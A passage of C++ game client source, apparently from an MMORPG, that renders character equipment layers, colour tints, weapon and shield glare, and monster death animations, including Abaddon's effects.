					     m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->m_rcBound.right, m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->m_rcBound.bottom);

				if ((iMantleIndex != -1) && (_cMantleDrawingOrder[_tmp_cDir] == 0))
				{	if (iMantleColor == 0)
						m_pSprite[iMantleIndex]->PutSpriteFast(sX, sY, (_tmp_cDir-1) * 8 + cFrame, dwTime);
					else m_pSprite[iMantleIndex]->PutSpriteRGB(sX, sY, (_tmp_cDir-1) * 8 + cFrame, m_wR[iMantleColor] -m_wR[0], m_wG[iMantleColor] -m_wG[0], m_wB[iMantleColor] -m_wB[0], dwTime);
				}

				if (iUndiesIndex != -1) m_pSprite[iUndiesIndex]->PutSpriteFast(sX, sY, (_tmp_cDir-1) * 8 + cFrame, dwTime);

				if ((iHairIndex != -1) && (iHelmIndex == -1))
				{	_GetHairColorRGB(((_tmp_sAppr1 & 0x00F0) >> 4), &iR, &iG, &iB);
					m_pSprite[iHairIndex]->PutSpriteRGB(sX, sY, (_tmp_cDir-1) * 8 + cFrame, iR, iG, iB, dwTime);
				}

				if ((iBootsIndex != -1) && (iSkirtDraw == 1))
				{	if (iBootsColor == 0)
						m_pSprite[iBootsIndex]->PutSpriteFast(sX, sY, (_tmp_cDir-1) * 8 + cFrame, dwTime);
					else m_pSprite[iBootsIndex]->PutSpriteRGB(sX, sY, (_tmp_cDir-1) * 8 + cFrame, m_wR[iBootsColor] -m_wR[0], m_wG[iBootsColor] -m_wG[0], m_wB[iBootsColor] -m_wB[0], dwTime);
				}

				if (iPantsIndex != -1)
				{	if (iPantsColor == 0)
						m_pSprite[iPantsIndex]->PutSpriteFast(sX, sY, (_tmp_cDir-1) * 8 + cFrame, dwTime);
					else m_pSprite[iPantsIndex]->PutSpriteRGB(sX, sY, (_tmp_cDir-1) * 8 + cFrame, m_wR[iPantsColor] -m_wR[0], m_wG[iPantsColor] -m_wG[0], m_wB[iPantsColor] -m_wB[0], dwTime);
				}

				if (iArmArmorIndex != -1)
				{	if (iArmColor == 0)
						m_pSprite[iArmArmorIndex]->PutSpriteFast(sX, sY, (_tmp_cDir-1) * 8 + cFrame, dwTime);
					else m_pSprite[iArmArmorIndex]->PutSpriteRGB(sX, sY, (_tmp_cDir-1) * 8 + cFrame, m_wR[iArmColor] -m_wR[0], m_wG[iArmColor] -m_wG[0], m_wB[iArmColor] -m_wB[0], dwTime);
				}

				if ((iBootsIndex != -1) && (iSkirtDraw == 0))
				{	if (iBootsColor == 0)
						m_pSprite[iBootsIndex]->PutSpriteFast(sX, sY, (_tmp_cDir-1) * 8 + cFrame, dwTime);
					else m_pSprite[iBootsIndex]->PutSpriteRGB(sX, sY, (_tmp_cDir-1) * 8 + cFrame, m_wR[iBootsColor] -m_wR[0], m_wG[iBootsColor] -m_wG[0], m_wB[iBootsColor] -m_wB[0], dwTime);
				}

				if (iBodyArmorIndex != -1)
				{	if (iArmorColor == 0)
						m_pSprite[iBodyArmorIndex]->PutSpriteFast(sX, sY, (_tmp_cDir-1) * 8 + cFrame, dwTime);
					else m_pSprite[iBodyArmorIndex]->PutSpriteRGB(sX, sY, (_tmp_cDir-1) * 8 + cFrame, m_wR[iArmorColor] -m_wR[0], m_wG[iArmorColor] -m_wG[0], m_wB[iArmorColor] -m_wB[0], dwTime);
				}

				if (iHelmIndex != -1)
				{	if (iHelmColor == 0)
						 m_pSprite[iHelmIndex]->PutSpriteFast(sX, sY, (_tmp_cDir-1) * 8 + cFrame, dwTime);
					else m_pSprite[iHelmIndex]->PutSpriteRGB(sX, sY, (_tmp_cDir-1) * 8 + cFrame, m_wR[iHelmColor] -m_wR[0], m_wG[iHelmColor] -m_wG[0], m_wB[iHelmColor] -m_wB[0], dwTime);
				}

				if ((iMantleIndex != -1) && (_cMantleDrawingOrder[_tmp_cDir] == 2))
				{	if (iMantleColor == 0)
						m_pSprite[iMantleIndex]->PutSpriteFast(sX, sY, (_tmp_cDir-1) * 8 + cFrame, dwTime);
					else m_pSprite[iMantleIndex]->PutSpriteRGB(sX, sY, (_tmp_cDir-1) * 8 + cFrame, m_wR[iMantleColor] -m_wR[0], m_wG[iMantleColor] -m_wG[0], m_wB[iMantleColor] -m_wB[0], dwTime);
				}

				if (iShieldIndex != -1)
				{	if (iShieldColor == 0)
						m_pSprite[iShieldIndex]->PutSpriteFast(sX, sY, (_tmp_cDir-1) * 8 + cFrame, dwTime);
					else m_pSprite[iShieldIndex]->PutSpriteRGB(sX, sY, (_tmp_cDir-1) * 8 + cFrame, m_wR[iShieldColor] -m_wR[0], m_wG[iShieldColor] -m_wG[0], m_wB[iShieldColor] -m_wB[0], dwTime);
					switch (iShieldGlare) {
					case 0: break;
					case 1: m_pEffectSpr[45]->PutTransSprite(sX -13, sY -34, 0, dwTime);
					case 2: m_pSprite[iShieldIndex]->PutTransSpriteRGB(sX, sY,  (_tmp_cDir-1) * 8 + cFrame, 0, m_iDrawFlag, 0, dwTime); break; // Green Glare
					case 3: m_pSprite[iShieldIndex]->PutTransSpriteRGB(sX, sY,  (_tmp_cDir-1) * 8 + cFrame, 0, 0, m_iDrawFlag, dwTime); break; // Blue Glare
				}	}

				if ((iMantleIndex != -1) && (_cMantleDrawingOrder[_tmp_cDir] == 1))
				{	if (iMantleColor == 0)
						m_pSprite[iMantleIndex]->PutSpriteFast(sX, sY, (_tmp_cDir-1) * 8 + cFrame, dwTime);
					else m_pSprite[iMantleIndex]->PutSpriteRGB(sX, sY, (_tmp_cDir-1) * 8 + cFrame, m_wR[iMantleColor] -m_wR[0], m_wG[iMantleColor] -m_wG[0], m_wB[iMantleColor] -m_wB[0], dwTime);
				}

				if (iWeaponIndex != -1)
				{	if (iWeaponColor == 0)
						m_pSprite[iWeaponIndex]->PutSpriteFast(sX, sY, cFrame, dwTime);
					else m_pSprite[iWeaponIndex]->PutSpriteRGB(sX, sY, cFrame, m_wWR[iWeaponColor] -m_wR[0], m_wWG[iWeaponColor] -m_wG[0], m_wWB[iWeaponColor] -m_wB[0], dwTime);
					DKGlare(iWeaponColor, iWeaponIndex, &iWeaponGlare);
					switch (iWeaponGlare) {
					case 0: break;
					case 1: m_pSprite[iWeaponIndex]->PutTransSpriteRGB(sX, sY,  cFrame, m_iDrawFlag, 0, 0, dwTime); break; // Red Glare
					case 2: m_pSprite[iWeaponIndex]->PutTransSpriteRGB(sX, sY,  cFrame, 0, m_iDrawFlag, 0, dwTime); break; // Green Glare
					case 3: m_pSprite[iWeaponIndex]->PutTransSpriteRGB(sX, sY,  cFrame, 0, 0, m_iDrawFlag, dwTime); break; // Blue Glare
			}	}	}

			if ((_tmp_iStatus & 0x20) != 0)	// Berserk
				m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->PutTransSpriteRGB(sX, sY, cFrame, 0, -5, -5, dwTime);
			DrawAngel(16+(_tmp_cDir - 1), sX+20, sY-20, cFrame%4, dwTime);
			DrawWanted(sX, sY, dwTime);
			CheckActiveAura2(sX, sY, dwTime,  _tmp_sOwnerType);

			//50Cent - Capture The Flag
			DrawFlagCarrier(sX, sY, _tmp_cFrame, dwTime);
		}
	}else if( strlen(_tmp_cName) > 0 )
	{	if( (_tmp_sOwnerType>=1) && (_tmp_sOwnerType<=6) ) DrawObjectName(sX, sY, _tmp_cName, _tmp_iStatus);
		//50Cent - HP Bar
		else
		{
			DrawNpcName(sX, sY, _tmp_sOwnerType, _tmp_iStatus);
    }    }
	if (_tmp_iChatIndex != NULL)
	{	if ((m_pChatMsgList[_tmp_iChatIndex] != NULL) && (m_pChatMsgList[_tmp_iChatIndex]->m_iObjectID == _tmp_wObjectID))
		{	m_pChatMsgList[_tmp_iChatIndex]->m_sX = sX;
			m_pChatMsgList[_tmp_iChatIndex]->m_sY = sY;
		}
		else
		{	m_pMapData->ClearChatMsg(indexX, indexY);
	}	}
	// Snoopy: Abaddon effects
	if (_tmp_sOwnerType == 81)
	{	int randFrame = _tmp_cFrame % 12;
		m_pEffectSpr[154]->PutTransSprite70(sX-50	, sY-50		, randFrame, dwTime);
		m_pEffectSpr[155]->PutTransSprite70(sX-20	, sY-80		, randFrame, dwTime);
		m_pEffectSpr[156]->PutTransSprite70(sX+70	, sY-50		, randFrame, dwTime);
		m_pEffectSpr[157]->PutTransSprite70(sX-30	, sY		, randFrame, dwTime);
		m_pEffectSpr[158]->PutTransSprite70(sX-60	, sY+90		, randFrame, dwTime);
		m_pEffectSpr[159]->PutTransSprite70(sX+65	, sY+85		, randFrame, dwTime);
		switch (_tmp_cDir) {
		case 1:
			m_pEffectSpr[153]->PutTransSprite70(sX		, sY+108 , _tmp_iEffectFrame %28, dwTime);
			m_pEffectSpr[164]->PutTransSprite70(sX-50	, sY+10	, _tmp_iEffectFrame %15, dwTime);
			break;
		case 2:
			m_pEffectSpr[153]->PutTransSprite70(sX		, sY+95	, _tmp_iEffectFrame %28, dwTime);
			m_pEffectSpr[164]->PutTransSprite70(sX-70	, sY+10	, _tmp_iEffectFrame %15, dwTime);
			break;
		case 3:
			m_pEffectSpr[153]->PutTransSprite70(sX		, sY+105 , _tmp_iEffectFrame %28, dwTime);
			m_pEffectSpr[164]->PutTransSprite70(sX-90	, sY+10	, _tmp_iEffectFrame %15, dwTime);
			break;
		case 4:
			m_pEffectSpr[153]->PutTransSprite70(sX-35	, sY+100 , _tmp_iEffectFrame %28, dwTime);
			m_pEffectSpr[164]->PutTransSprite70(sX-80	, sY+10	, _tmp_iEffectFrame %15, dwTime);
			break;
		case 5:
			m_pEffectSpr[153]->PutTransSprite70(sX		, sY+95	, _tmp_iEffectFrame %28, dwTime);
			m_pEffectSpr[164]->PutTransSprite70(sX-65	, sY-5	, _tmp_iEffectFrame %15, dwTime);
			break;
		case 6:
			m_pEffectSpr[153]->PutTransSprite70(sX+45	, sY+95	, _tmp_iEffectFrame %28, dwTime);
			m_pEffectSpr[164]->PutTransSprite70(sX-31	, sY+10	, _tmp_iEffectFrame %15, dwTime);
			break;
		case 7:
			m_pEffectSpr[153]->PutTransSprite70(sX+40	, sY+110 , _tmp_iEffectFrame %28, dwTime);
			m_pEffectSpr[164]->PutTransSprite70(sX-30	, sY+10	, _tmp_iEffectFrame %15, dwTime);
			break;
		case 8:
			m_pEffectSpr[153]->PutTransSprite70(sX+20	, sY+110 , _tmp_iEffectFrame %28, dwTime);
			m_pEffectSpr[164]->PutTransSprite70(sX-20	, sY+16	, _tmp_iEffectFrame %15, dwTime);
			break;
	}	}
	if ( (m_pSprite[iBodyIndex + (_tmp_cDir -1)]->m_rcBound.top != -1) &&
		 (m_pSprite[iBodyIndex + (_tmp_cDir -1)]->m_rcBound.top < msY) &&
		 (m_pSprite[iBodyIndex + (_tmp_cDir -1)]->m_rcBound.bottom > msY) &&
		 (m_pSprite[iBodyIndex + (_tmp_cDir -1)]->m_rcBound.left < msX) &&
		 (m_pSprite[iBodyIndex + (_tmp_cDir -1)]->m_rcBound.right > msX) ) return TRUE;

	return FALSE;
}

BOOL CGame::DrawObject_OnDying(int indexX, int indexY, int sX, int sY, BOOL bTrans, DWORD dwTime, int msX, int msY)
{int iBodyIndex, iUndiesIndex, iHairIndex, iArmArmorIndex, iBodyArmorIndex, iPantsIndex, iBootsIndex, iR, iG, iB,  iHelmIndex, iMantleIndex;
 int iWeaponColor, iShieldColor, iArmorColor, iMantleColor, iArmColor, iPantsColor, iBootsColor, iHelmColor;
 int iSkirtDraw = 0;
 char cFrame;
 int randFrame;

	if (m_cDetailLevel == 0)
	{	iWeaponColor = 0;
		iShieldColor = 0;
		iArmorColor  = 0;
		iMantleColor = 0;
		iArmColor    = 0;
		iPantsColor  = 0;
		iBootsColor  = 0;
		iHelmColor   = 0;
	}else
	{	iWeaponColor = (_tmp_iApprColor & 0xF0000000) >> 28;
		iShieldColor = (_tmp_iApprColor & 0x0F000000) >> 24;
		iArmorColor  = (_tmp_iApprColor & 0x00F00000) >> 20;
		iMantleColor = (_tmp_iApprColor & 0x000F0000) >> 16;
		iArmColor    = (_tmp_iApprColor & 0x0000F000) >> 12;
		iPantsColor  = (_tmp_iApprColor & 0x00000F00) >> 8;
		iBootsColor  = (_tmp_iApprColor & 0x000000F0) >> 4;
		iHelmColor   = (_tmp_iApprColor & 0x0000000F);
	}
	cFrame = _tmp_cFrame;

	 switch (_tmp_sOwnerType) {
	 case 1:
	 case 2:
	 case 3:
		if (cFrame < 6)
		{	iBodyIndex = 500 + (_tmp_sOwnerType - 1 )*8*15 + (0 * 8);
			iUndiesIndex = DEF_SPRID_UNDIES_M + (_tmp_sAppr1 & 0x000F)*15;
			iHairIndex   = DEF_SPRID_HAIR_M	+ ((_tmp_sAppr1 & 0x0F00) >> 8)*15 + 0;
			if ((_tmp_sAppr4 & 0x80) == 0)
			{	if (((_tmp_sAppr3 & 0xF000) >> 12) == 0)
					 iBodyArmorIndex = -1;
				else iBodyArmorIndex = DEF_SPRID_BODYARMOR_M + ((_tmp_sAppr3 & 0xF000) >> 12)*15 + 0;
			}
			if ((_tmp_sAppr3 & 0x000F) == 0)
				 iArmArmorIndex = -1;
			else iArmArmorIndex = DEF_SPRID_BERK_M + (_tmp_sAppr3 & 0x000F)*15 + 0;
			if ((_tmp_sAppr3 & 0x0F00) == 0)
				 iPantsIndex = -1;
			else iPantsIndex = DEF_SPRID_LEGG_M + ((_tmp_sAppr3 & 0x0F00) >> 8)*15 + 0;
			if (((_tmp_sAppr4 & 0xF000) >> 12) == 0)
				 iBootsIndex = -1;
			else iBootsIndex = DEF_SPRID_BOOT_M + ((_tmp_sAppr4 & 0xF000) >> 12)*15 + 0;
			if ((_tmp_sAppr4 & 0x0F00) == 0)
				 iMantleIndex = -1;
			else iMantleIndex = DEF_SPRID_MANTLE_M + ((_tmp_sAppr4 & 0x0F00) >> 8)*15 + 0;
			if ((_tmp_sAppr3 & 0x00F0) == 0)
				 iHelmIndex = -1;
			else iHelmIndex = DEF_SPRID_HEAD_M + ((_tmp_sAppr3 & 0x00F0) >> 4)*15 + 0;
		}else
		{	cFrame -= 6;
			iBodyIndex = 500 + (_tmp_sOwnerType - 1 )*8*15 + (11 * 8);
			iUndiesIndex = DEF_SPRID_UNDIES_M + (_tmp_sAppr1 & 0x000F)*15 + 11;
			iHairIndex   = DEF_SPRID_HAIR_M	+ ((_tmp_sAppr1 & 0x0F00) >> 8)*15 + 11;
			if ((_tmp_sAppr4 & 0x80) == 0)
			{	if (((_tmp_sAppr3 & 0xF000) >> 12) == 0)
				     iBodyArmorIndex = -1;
				else iBodyArmorIndex = DEF_SPRID_BODYARMOR_M + ((_tmp_sAppr3 & 0xF000) >> 12)*15 + 11;
			}
			if ((_tmp_sAppr3 & 0x000F) == 0)
				 iArmArmorIndex = -1;
			else iArmArmorIndex = DEF_SPRID_BERK_M + (_tmp_sAppr3 & 0x000F)*15 + 11;
			if ((_tmp_sAppr3 & 0x0F00) == 0)
				 iPantsIndex = -1;
			else iPantsIndex = DEF_SPRID_LEGG_M + ((_tmp_sAppr3 & 0x0F00) >> 8)*15 + 11;
			if (((_tmp_sAppr4 & 0xF000) >> 12) == 0)
				 iBootsIndex = -1;
			else iBootsIndex = DEF_SPRID_BOOT_M + ((_tmp_sAppr4 & 0xF000) >> 12)*15 + 11;
			if ((_tmp_sAppr4 & 0x0F00) == 0)
				 iMantleIndex = -1;
			else iMantleIndex = DEF_SPRID_MANTLE_M + ((_tmp_sAppr4 & 0x0F00) >> 8)*15 + 11;
			if ((_tmp_sAppr3 & 0x00F0) == 0)
				 iHelmIndex = -1;
			else iHelmIndex = DEF_SPRID_HEAD_M + ((_tmp_sAppr3 & 0x00F0) >> 4)*15 + 11;
		}
		m_pEffectSpr[160]->PutTransSprite70(sX, sY, _tmp_iEffectFrame  %12, dwTime);  //Efecto de Alma al morir -byNamesis
		break;

	 case 4:
	 case 5:
	 case 6:
		 if (((_tmp_sAppr3 & 0x0F00) >> 8) == 1) iSkirtDraw = 1;
		 if (cFrame < 6)
		 {	iBodyIndex = 500 + (_tmp_sOwnerType - 1 )*8*15 + (0 * 8);
			iUndiesIndex = DEF_SPRID_UNDIES_W + (_tmp_sAppr1 & 0x000F)*15;
			iHairIndex   = DEF_SPRID_HAIR_W	+ ((_tmp_sAppr1 & 0x0F00) >> 8)*15 + 0;
			if ((_tmp_sAppr4 & 0x80) == 0)
			{	if (((_tmp_sAppr3 & 0xF000) >> 12) == 0)
					 iBodyArmorIndex = -1;
				else iBodyArmorIndex = DEF_SPRID_BODYARMOR_W + ((_tmp_sAppr3 & 0xF000) >> 12)*15 + 0;
			}
			if ((_tmp_sAppr3 & 0x000F) == 0)
				 iArmArmorIndex = -1;
			else iArmArmorIndex = DEF_SPRID_BERK_W + (_tmp_sAppr3 & 0x000F)*15 + 0;
			if ((_tmp_sAppr3 & 0x0F00) == 0)
				 iPantsIndex = -1;
			else iPantsIndex = DEF_SPRID_LEGG_W + ((_tmp_sAppr3 & 0x0F00) >> 8)*15 + 0;
			if (((_tmp_sAppr4 & 0xF000) >> 12) == 0)
				 iBootsIndex = -1;
			else iBootsIndex = DEF_SPRID_BOOT_W + ((_tmp_sAppr4 & 0xF000) >> 12)*15 + 0;
			if ((_tmp_sAppr4 & 0x0F00) == 0)
				 iMantleIndex = -1;
			else iMantleIndex = DEF_SPRID_MANTLE_W + ((_tmp_sAppr4 & 0x0F00) >> 8)*15 + 0;
			if ((_tmp_sAppr3 & 0x00F0) == 0)
				 iHelmIndex = -1;
			else iHelmIndex = DEF_SPRID_HEAD_W + ((_tmp_sAppr3 & 0x00F0) >> 4)*15 + 0;
		}else
		{ 	cFrame -= 6;
			iBodyIndex = 500 + (_tmp_sOwnerType - 1 )*8*15 + (11 * 8);
			iUndiesIndex = DEF_SPRID_UNDIES_W + (_tmp_sAppr1 & 0x000F)*15 + 11;
			iHairIndex   = DEF_SPRID_HAIR_W	+ ((_tmp_sAppr1 & 0x0F00) >> 8)*15 + 11;
			if ((_tmp_sAppr4 & 0x80) == 0)
			{	if (((_tmp_sAppr3 & 0xF000) >> 12) == 0)
				     iBodyArmorIndex = -1;
				else iBodyArmorIndex = DEF_SPRID_BODYARMOR_W + ((_tmp_sAppr3 & 0xF000) >> 12)*15 + 11;
			}
			if ((_tmp_sAppr3 & 0x000F) == 0)
				 iArmArmorIndex = -1;
			else iArmArmorIndex = DEF_SPRID_BERK_W + (_tmp_sAppr3 & 0x000F)*15 + 11;
			if ((_tmp_sAppr3 & 0x0F00) == 0)
				 iPantsIndex = -1;
			else iPantsIndex = DEF_SPRID_LEGG_W + ((_tmp_sAppr3 & 0x0F00) >> 8)*15 + 11;
			if (((_tmp_sAppr4 & 0xF000) >> 12) == 0)
				 iBootsIndex = -1;
			else iBootsIndex = DEF_SPRID_BOOT_W + ((_tmp_sAppr4 & 0xF000) >> 12)*15 + 11;
			if ((_tmp_sAppr4 & 0x0F00) == 0)
				 iMantleIndex = -1;
			else iMantleIndex = DEF_SPRID_MANTLE_W + ((_tmp_sAppr4 & 0x0F00) >> 8)*15 + 11;
			if ((_tmp_sAppr3 & 0x00F0) == 0)
				 iHelmIndex = -1;
			else iHelmIndex = DEF_SPRID_HEAD_W + ((_tmp_sAppr3 & 0x00F0) >> 4)*15 + 11;
		}
		m_pEffectSpr[160]->PutTransSprite70(sX, sY, _tmp_iEffectFrame  %12, dwTime);  //Efecto de Alma al morir -byNamesis
		break;

	 default:
		if (cFrame < 4)
		{	if (_tmp_sAppr2 != 0)
			{	 iBodyIndex =  DEF_SPRID_MOB +  (_tmp_sOwnerType - 10 )*8*7 + (4 * 8);
				 cFrame = _tmp_sAppr2 -1;
			}
			else if (_tmp_sOwnerType == 66) iBodyIndex =  DEF_SPRID_MOB +  (_tmp_sOwnerType - 10 )*8*7 + (2 * 8);
			else if (_tmp_sOwnerType == 73) iBodyIndex =  DEF_SPRID_MOB +  (_tmp_sOwnerType - 10 )*8*7 + (2 * 8);
			else if (_tmp_sOwnerType == 81) iBodyIndex =  DEF_SPRID_MOB +  (_tmp_sOwnerType - 10 )*8*7 + (3 * 8);
			else if (_tmp_sOwnerType == 86) iBodyIndex =  DEF_SPRID_MOB +  (_tmp_sOwnerType - 10 )*8*7 + (3 * 8);
			else if (_tmp_sOwnerType == 87) iBodyIndex =  DEF_SPRID_MOB +  (_tmp_sOwnerType - 10 )*8*7 + (3 * 8);
			else if (_tmp_sOwnerType == 89) iBodyIndex =  DEF_SPRID_MOB +  (_tmp_sOwnerType - 10 )*8*7 + (3 * 8);
			else if (_tmp_sOwnerType == 91) iBodyIndex =  DEF_SPRID_MOB +  (_tmp_sOwnerType - 10 )*8*7 + (2 * 8);
			else iBodyIndex =  DEF_SPRID_MOB  +  (_tmp_sOwnerType - 10 )*8*7 + (0 * 8);
			iUndiesIndex = -1;
			iHairIndex   = -1;
			iArmArmorIndex = -1;
			iBodyArmorIndex = -1;
			iPantsIndex = -1;
			iBootsIndex = -1;
			iMantleIndex = -1;
			iHelmIndex      = -1;
			switch (_tmp_sOwnerType) {
			case 36: // AGT
			case 37: // CGT
			case 38: // MS
			case 39: // DT
			case 40: // ESG
			case 41: // GMG
			case 42: // ManaStone
				if (_tmp_sAppr2 == 0) cFrame = 0;
				break;
			case 51: cFrame = 0; break;
			}
		}else
		{	switch (_tmp_sOwnerType) {
			case 51: cFrame = 0; break;
			default: cFrame -= 4; break;
			}
			if (_tmp_sAppr2 != 0)
			{	 iBodyIndex =  DEF_SPRID_MOB  +  (_tmp_sOwnerType - 10 )*8*7 + (4 * 8);
				 cFrame = _tmp_sAppr2 -1;
			}
			else if (_tmp_sOwnerType == 66) iBodyIndex =  DEF_SPRID_MOB +  (_tmp_sOwnerType - 10 )*8*7 + (2 * 8);
			else if (_tmp_sOwnerType == 73) iBodyIndex =  DEF_SPRID_MOB +  (_tmp_sOwnerType - 10 )*8*7 + (2 * 8);
			else if (_tmp_sOwnerType == 81) iBodyIndex =  DEF_SPRID_MOB +  (_tmp_sOwnerType - 10 )*8*7 + (3 * 8);
			else if (_tmp_sOwnerType == 86) iBodyIndex =  DEF_SPRID_MOB +  (_tmp_sOwnerType - 10 )*8*7 + (3 * 8);
			else if (_tmp_sOwnerType == 87) iBodyIndex =  DEF_SPRID_MOB +  (_tmp_sOwnerType - 10 )*8*7 + (3 * 8);
			else if (_tmp_sOwnerType == 89) iBodyIndex =  DEF_SPRID_MOB +  (_tmp_sOwnerType - 10 )*8*7 + (3 * 8);
			else if (_tmp_sOwnerType == 91) iBodyIndex =  DEF_SPRID_MOB +  (_tmp_sOwnerType - 10 )*8*7 + (2 * 8);
			else iBodyIndex =  DEF_SPRID_MOB  +  (_tmp_sOwnerType - 10 )*8*7 + (4 * 8);
			iUndiesIndex = -1;
			iHairIndex   = -1;
			iArmArmorIndex = -1;
			iBodyArmorIndex = -1;
			iPantsIndex = -1;
			iBootsIndex = -1;
			iMantleIndex = -1;
			iHelmIndex   = -1;
		}
		break;
	}
	if (m_bIsCrusadeMode || m_bIsHeldenian) DrawObjectFOE(sX, sY, cFrame);

	if (_tmp_iEffectType != 0)
	{	switch (_tmp_iEffectType) {
		case 1: m_pEffectSpr[26]->PutTransSprite(sX, sY, _tmp_iEffectFrame, dwTime); break; // Special Ability: Attack Effect
		case 2: m_pEffectSpr[27]->PutTransSprite(sX, sY, _tmp_iEffectFrame, dwTime); break; // Special Ability: Protect Effect
	}	}

	if (bTrans == FALSE)
	{	switch (_tmp_sOwnerType) { // Pas d'ombre pour ces mobs
		case 10: // Slime
		case 35: // Energy Sphere
		
		case 66: // Wyvern
		case 73: // Fire Wyvern
		case 81: // Abaddon
		case 91: // Gate
			break;
		default:
			if (m_cDetailLevel != 0)
			{	if (sX < 50)
					 m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->PutShadowSpriteClip(sX, sY, cFrame, dwTime);
				else m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->PutShadowSprite(sX, sY, cFrame, dwTime);
			}
			break;
		}
		if (_tmp_sOwnerType == 81)
		{	m_pEffectSpr[152]->PutTransSprite70(sX-80	, sY-15 , _tmp_iEffectFrame %27, dwTime); // Explosion Abaddon
			m_pEffectSpr[152]->PutTransSprite70(sX		, sY-15 , _tmp_iEffectFrame %27, dwTime);
			m_pEffectSpr[152]->PutTransSprite70(sX-40	, sY	, _tmp_iEffectFrame %27, dwTime);
			m_pEffectSpr[163]->PutTransSprite70(sX-90	, sY-80	, _tmp_iEffectFrame %12, dwTime); // Ames qui s'envolent
			m_pEffectSpr[160]->PutTransSprite70(sX-60	, sY-50	, _tmp_iEffectFrame %12, dwTime);
			m_pEffectSpr[161]->PutTransSprite70(sX-30	, sY-20	, _tmp_iEffectFrame %12, dwTime);
			m_pEffectSpr[162]->PutTransSprite70(sX		, sY-100, _tmp_iEffectFrame %12, dwTime);
			m_pEffectSpr[163]->PutTransSprite70(sX+30	, sY-30	, _tmp_iEffectFrame %12, dwTime);
			m_pEffectSpr[162]->PutTransSprite70(sX+60	, sY-90	, _tmp_iEffectFrame %12, dwTime);
			m_pEffectSpr[163]->PutTransSprite70(sX+90	, sY-50	, _tmp_iEffectFrame %12, dwTime);
			switch (_tmp_cDir) {
			case 1: m_pEffectSpr[140]->PutTransSprite70(sX, sY, cFrame, dwTime); break; // Abbadon dying
			case 2: m_pEffectSpr[141]->PutTransSprite70(sX, sY, cFrame, dwTime); break; // fixed sprit IDs
			case 3: m_pEffectSpr[142]->PutTransSprite70(sX, sY, cFrame, dwTime); break;
			case 4: m_pEffectSpr[143]->PutTransSprite70(sX, sY, cFrame, dwTime); break;
			case 5: m_pEffectSpr[144]->PutTransSprite70(sX, sY, cFrame, dwTime); break;
			case 6: m_pEffectSpr[145]->PutTransSprite70(sX, sY, cFrame, dwTime); break;
			case 7: m_pEffectSpr[146]->PutTransSprite70(sX, sY, cFrame, dwTime); break;
			case 8: m_pEffectSpr[147]->PutTransSprite70(sX, sY, cFrame, dwTime); break;
			}
		}else if( _tmp_sOwnerType == 66 ) m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->PutTransSprite(sX, sY, cFrame, dwTime);
		else if( _tmp_sOwnerType == 73 )
		{	m_pSprite[33]->PutTransSprite(sX, sY, cFrame, dwTime);
			switch (_tmp_cDir) {
			case 1: m_pEffectSpr[141]->PutTransSprite70(sX, sY, cFrame+8, dwTime); break; // Abbadon qui meurt
			case 2: m_pEffectSpr[142]->PutTransSprite70(sX, sY, cFrame+8, dwTime); break;
			case 3: m_pEffectSpr[143]->PutTransSprite70(sX, sY, cFrame+8, dwTime); break;
			case 4: m_pEffectSpr[144]->PutTransSprite70(sX, sY, cFrame+8, dwTime); break;
			case 5: m_pEffectSpr[145]->PutTransSprite70(sX, sY, cFrame+8, dwTime); break;
			case 6: m_pEffectSpr[146]->PutTransSprite70(sX, sY, cFrame+8, dwTime); break;
			case 7: m_pEffectSpr[147]->PutTransSprite70(sX, sY, cFrame+8, dwTime); break;
			case 8: m_pEffectSpr[141]->PutTransSprite70(sX, sY, cFrame+8, dwTime); break; //due to buggy Sprite nb
			}
		}else
		{	if ((_tmp_iStatus & 0x40) != 0)
				 m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->PutSpriteRGB(sX, sY, cFrame, m_wR[10] -m_wR[0]/2, m_wG[10] -m_wG[0]/2, m_wB[10] -m_wB[0]/2, dwTime);
			else m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->PutSpriteFast(sX, sY, cFrame, dwTime);
		}

		SetRect(&m_rcBodyRect, m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->m_rcBound.left, m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->m_rcBound.top,
			     m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->m_rcBound.right, m_pSprite[iBodyIndex + (_tmp_cDir - 1)]->m_rcBound.bottom);

		if (iUndiesIndex != -1) m_pSprite[iUndiesIndex]->PutSpriteFast(sX, sY, (_tmp_cDir-1) * 8 + cFrame, dwTime);

		if ((iHairIndex != -1) && (iHelmIndex == -1))
		{	_GetHairColorRGB(((_tmp_sAppr1 & 0x00F0) >> 4), &iR, &iG, &iB);
			m_pSprite[iHairIndex]->PutSpriteRGB(sX, sY, (_tmp_cDir-1) * 8 + cFrame, iR, iG, iB, dwTime);
		}

		if ((iBootsIndex != -1) && (iSkirtDraw == 1))
		{	if (iBootsColor == 0)
				m_pSprite[iBootsIndex]->PutSpriteFast(sX, sY, (_tmp_cDir-1) * 8 + cFrame, dwTime);
			else m_pSprite[iBootsIndex]->PutSpriteRGB(sX, sY, (_tmp_cDir-1) * 8 + cFrame, m_wR[iBootsColor] -m_wR[0], m_wG[iBootsColor] -m_wG[0], m_wB[iBootsColor] -m_wB[0], dwTime);
		}

		if (iPantsIndex != -1)
		{	if (iPantsColor == 0)
				m_pSprite[iPantsIndex]->PutSpriteFast(sX, sY, (_tmp_cDir-1) * 8 + cFrame, dwTime);
			else m_pSprite[iPantsIndex]->PutSpriteRGB(sX, sY, (_tmp_cDir-1) * 8 + cFrame, m_wR[iPantsColor] -m_wR[0], m_wG[iPantsColor] -m_wG[0], m_wB[iPantsColor] -m_wB[0], dwTime);
		}

		if (iArmArmorIndex != -1)
		{	if (iArmColor == 0)
				m_pSprite[iArmArmorIndex]->PutSpriteFast(sX, sY, (_tmp_cDir-1) * 8 + cFrame, dwTime);
			else m_pSprite[iArmArmorIndex]->PutSpriteRGB(sX, sY, (_tmp_cDir-1) * 8 + cFrame, m_wR[iArmColor] -m_wR[0], m_wG[iArmColor] -m_wG[0], m_wB[iArmColor] -m_wB[0], dwTime);
		}

		if ((iBootsIndex != -1) && (iSkirtDraw == 0))
		{	if (iBootsColor == 0)
